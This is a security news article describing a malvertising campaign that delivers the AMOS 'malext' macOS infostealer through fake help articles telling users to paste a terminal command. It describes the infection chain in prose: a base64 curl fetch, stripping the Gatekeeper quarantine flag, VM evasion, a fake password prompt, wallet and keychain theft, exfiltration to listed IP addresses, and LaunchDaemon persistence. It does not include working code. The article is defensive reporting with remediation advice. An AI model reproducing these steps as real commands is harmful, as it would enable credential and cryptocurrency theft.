Malvertising Campaign Delivers AMOS ‘malext’ macOS Infostealer via Fake Text‑Sharing Lures

A new malvertising campaign is actively targeting macOS users worldwide, delivering a new variant of the AMOS infostealer called “malext.”

Attackers are purchasing Google Search ads that push victims toward fake help articles on free text-sharing websites, where a deceptive terminal command silently installs the stealer on their machines.​

The campaign first came to light when a macOS user searching Google for storage cleanup help stumbled upon the top search result — a fake Medium blog post.

The post appeared legitimate and included a ready-to-paste terminal command as part of the “fix.”

The user only grew suspicious when the device started asking for the administrative password in a loop, narrowly escaping a full system compromise. That incident opened the door to a wider investigation.​

A computer enthusiast,

Using Google’s Ads Transparency tool, they uncovered more than 34 active attack chains and over 53 hijacked Google Ads accounts being used to push malicious lures.

The scale of the operation suggested involvement from a larger organized criminal group, likely a “Traffer” network.​

Beyond Medium, the attackers hosted fake articles on Evernote, mssg.me, and kimi.com — services that require no identity checks to use.

Each time a malicious article was removed, the attackers replaced it immediately, demonstrating a well-maintained and persistent operation.

These pages mimic real help guides, directing victims through two steps that end in a harmful terminal command.​

The final payload — “malext” — is a new AMOS (Atomic macOS Stealer) variant, named after the C2 domain malext[.]com hardcoded in the sample.

Once active, it harvests browser credentials, Apple Notes, Safari cookies, crypto wallet data, Telegram sessions, and the macOS keychain.

It then backdoors Ledger and Trezor wallet applications by swapping them with trojanized versions, granting attackers prolonged access to the victim’s finances.​

Inside the Kill Chain: Infection and Persistence

The infection starts when a user pastes the terminal command from a lure page.

Decoding the base64-encoded exposes a curl request fetching a remote script that layers both Base64 encoding and gzip compression — a rare double-obfuscation technique.

Once fully unpacked, the real command downloads a MachO binary to /tmp, strips macOS’s Gatekeeper quarantine flag using xattr -c, and runs it with no warning shown to the user.​

Before running the stealer, the MachO binary — built for both ARM and x86-64 architectures — executes a VM detection check.

This check, obfuscated with a Caesar cipher, queries macOS’s system_profiler for signs of QEMU, VMware, or KVM.

It also looks for hardware indicators typical of sandbox environments like fake board serial numbers and unusually old processors. This successfully blocked execution across every major macOS sandbox tested, including VirusTotal and Tria.ge.​

When no sandbox is detected, the main 59,444-character AppleScript payload runs. It hides the terminal window, collects hardware details, and steals the macOS login password using a fake helper installation dialog if no stored credential is found.

The stealer then sweeps through browser profiles, crypto wallets, the macOS keychain, Telegram sessions, and Apple Notes, compressing all collected data into a zip archive. Exfiltration goes to 38.244.158[.]56, with 199.217.98.33 as a backup.

A LaunchDaemon plist at com.finder.helper.plist installs a persistent backdoor that restarts on every reboot.​

macOS users should never paste terminal commands from online articles, no matter how helpful they appear. Keep Gatekeeper and System Integrity Protection always enabled, and approach any Google ad-labeled search result with caution.

If an infection is suspected, immediately remove the files ~/.pass, ~/.agent, ~/.mainhelper, ~/.username, and the LaunchDaemon entry com.finder.helper.plist, change all browser-saved passwords, and reinstall affected cryptocurrency wallet apps from their official source.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.